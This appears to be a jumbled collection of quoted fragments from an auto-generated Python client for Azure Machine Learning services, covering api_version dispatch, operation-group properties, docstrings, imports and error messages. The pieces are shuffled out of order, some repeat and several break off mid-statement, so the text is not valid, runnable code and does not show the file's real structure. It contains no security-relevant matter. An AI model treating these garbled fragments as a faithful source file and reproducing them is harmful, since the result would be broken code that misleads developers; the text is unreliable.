api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version ==", "from ..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory import", "'2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version: * 1.0.0:", "2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API", "{} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "\"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as", "ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property 
def dataset_versions(self): \"\"\"Instance depends on the API version: *", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version ==", "1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "== '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None,", "self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise", ":class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version))", "may cause incorrect behavior and will be lost if the code is #", "not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self):", "api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API", "self._get_api_version('usages') if 
api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version", "{} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01',", "version {} does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version))", "* 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from", "models return models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models", "raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config,", "import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import 
EnvironmentContainersOperations as", "api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API version:", "def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview:", "default, it uses the latest API version available on public Azure. For production,", "* 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview:", "\"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\"", "DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
online_endpoints(self): \"\"\"Instance depends on the API", "ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import", "API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0':", "group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on", "not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0:", "Default waiting time between two polls for LRO operations if no Retry-After header", "A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval:", "not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self):", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: *", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version", "depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" 
api_version = self._get_api_version('experiments') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return", "'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\",", "self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise", "\"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version ==", "* 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers')", "* 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version ==", "'2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import 
AsyncTokenCredential class _SDKClient(object): def", "group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on", "{} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>`", "depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01:", "= self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: 
:class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version =", "have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client,", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise ValueError(\"API version", "from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version ==", "def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise", "import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as", "== '2021-10-01-dataplanepreview': from 
..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from", "operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends", "* 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations", "* 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version:", "under the MIT License. 
See License.txt in the project root for # license", "== '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {}", "version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version", "2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "operation group is not described in the profile. :param credential: Credential needed for", "{ None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0',", "import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as", "Learning Workspace resources. 
This ready contains multiple API versions, to help you deal", "{} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from", "api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {}", "version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "RunOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version))", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return", "on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` 
\"\"\" api_version =", "else: raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client,", "* 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config,", "the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version ==", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version:", "2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0':", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API", "depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if", "Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance 
depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>`", "== 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {}", "on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version", "from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "== 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {}", "'2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from ..v2022_05_01", "elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version", "import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as", "..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations", "is provided, or if missing in profile. 
:type api_version: str :param base_url: Service", "'1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on the API", "else: raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client,", "'1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01',", "not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self):", "'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2':", "'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the", "Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>`", "api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass", "@property def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` *", "from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "@property def events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\"", "if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API", "CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "models elif api_version == '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API", "profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None: self._config =", "..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations", "from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not", "2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01':", "== '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as 
OperationClass else: raise ValueError(\"API version {}", "version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as", "group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on", "ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass", "depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0:", "api_version == 'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0':", "# license information. 
# # Code generated by Microsoft (R) AutoRest Code Generator.", ":mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version", "from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01':", "ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version:", "have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0:", "self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k,", 
"OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>`", "== '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('component_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif", "raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "AutoRest Code Generator. 
# Changes may cause incorrect behavior and will be lost", "api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass", "API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0':", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return", "API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0':", "@property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` *", "2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01':", "the profile. 
:param credential: Credential needed for the client to connect to Azure.", "str :param api_version: API version to use if no profile is provided, or", "from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version =", "return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models elif", "{} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self):", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API", "does not have operation group 'component_containers'\".format(api_version)) return 
